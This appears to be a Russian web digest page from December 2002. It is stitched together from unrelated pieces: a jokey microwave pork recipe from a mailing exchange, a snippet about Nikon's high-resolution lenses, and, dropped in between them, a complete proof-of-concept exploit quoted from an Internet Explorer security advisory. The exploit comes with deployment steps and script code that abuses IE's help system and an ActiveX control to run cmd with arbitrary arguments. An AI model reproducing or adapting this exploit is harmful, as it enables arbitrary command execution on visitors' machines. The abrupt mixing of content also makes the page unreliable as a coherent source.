15 декабря 02 года
From: dmitry radishev To: Dmitry Anokhin> Здравствуйте, dibr. > > Ээээ... помнится у тебя были оченно-хорошие рецептики для > микроволновки. У тебя не возникала мысль организовать их в некую > "поваренную книгу для микроволновки"? Мысль благополучно удушается ленью (и осознанием того, что специализированные ресурсы типа кукинг.ру всё равно толще), но - хорошо что напомнил, держи ещё один рецептик [будет в следующем выпуске] :-) > У нас в организацию купили эту самую микроволновку и что теперь с ней > делать никто не знает. :-))) Хот-доги делать :-) \begin{recipe} Микроволновка все-таки отучает и обленяет. Хотя и определенный простор для экспериментов и открываний новых велосипедов - даёт. Велосипедов - это неожиданных открытий, вроде того, что "пока мясо еще жесткое - овощи-фрукты уже изменили агрегатное состояние", а экспериментов - это "как бы сделать так, чтобы поменьше делать, и получше получилось". \par Итак. За основу берем свинину, запеченную в фольге в духовке. Духовку гневно отбрасываем, как устаревшую и неудобную. Фольгу с сожалением отвергаем, как непригодную для микроволновки. Рецептуру корректируем с учетом отброшенного и дополняем с учетом где-то когда-то увиденного. В результате получаем. \par Свинину режем крупными (крупными я сказал!) кусками. Обмазываем горчицей (правильной горчицей - она такая не горькая но жгучая), посыпаем какой-нибудь "стандартной специей с перцем для мяса". Дно микроволновой посуды обмазываем майонезом, сами куски тоже обмазываем нетолстым слоем майонеза (в основном для защиты от высыхания) и кладем плотно друг к другу. Закрываем крышкой и включаем на полную мощность. Если начинает пениться и плеваться - слегка перекосить крышку, чтобы осталась щель. \par Пока там шипит и плюется - готовим "соус". Очищаем апельсин. Плюхаем майонеза. Чуть-чуть солим и добавляем опять же специй. Режем по одной черносливине и кураге (больше не надо) и плюхаем туда же. Давим пару зубков чеснока. Берем немного сыра и мелко режем. Добавляем водички. Далее - берем миксер с насадкой "порубающей всё на куски", и старательно рубим все это до состояния полужидкой трухи. При необходимости (если миксер клинит или проскальзывает) - чуть-чуть добавить водичики. \par Шипеть и плеваться должно "до готовности". Готовность определяется по загустению натекшего сока и ощущению "щас сгорит". Ощущение должно быть конгруэнтным - от "уже готово" до "уже сгорело" проходит буквально три-четыре минуты, если же остановить процесс раньше времени - будет жестковато. \par Вынимаем из микроволновки, разлепляем куски, промазываем-заливаем свежесделанным соусом, и - возвращаем в микроволновку на 10-15 минут, не больше. Извлекаем и едим! \par Как готовить гарнир (рис) - рассказывать не буду, не маленькие. Разумеется, он готовится в микроволновке :-)) \end{recipe} |
INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST START
WITH HTTP://).
4. The script will open up a dos window and display a line of text, create
the file c:/vulnerable.txt (write permission required) and start winmine
(this excellent game must exist). The help window for IE will not be
closed.
TESTED:
Win2000 pro, XP, IE 6 (latest patches).
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\\","+prog+","+args+"\\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--------------------------- CUT HERE ---------------------------
Area: RU.PHOTO.DIGITAL From: Iliah Borg To: Eugeny Kreewosheyew Subj: Японский юмор [skip] Hа Фотокине Nikon'овцы говорили, что размер сенсора менять в обозримом будущем не будут, а вместо этого выпустят новую линейку оптики высокого разрешения. Это был разговор частный. Теперь мы имеем реально заявленный объектив (утверждается, что его разрешение выше *200* пар линий на мм) и обещания в феврале (в Лас-Вегасе) продемонстрировать чуть ли не готовую линейку. |
Оригинал страницы находится на http://dibr.nnov.ru/issue151202.html. | (с) DiBR |
При перепечатке ссылка обязательна. | << * >> |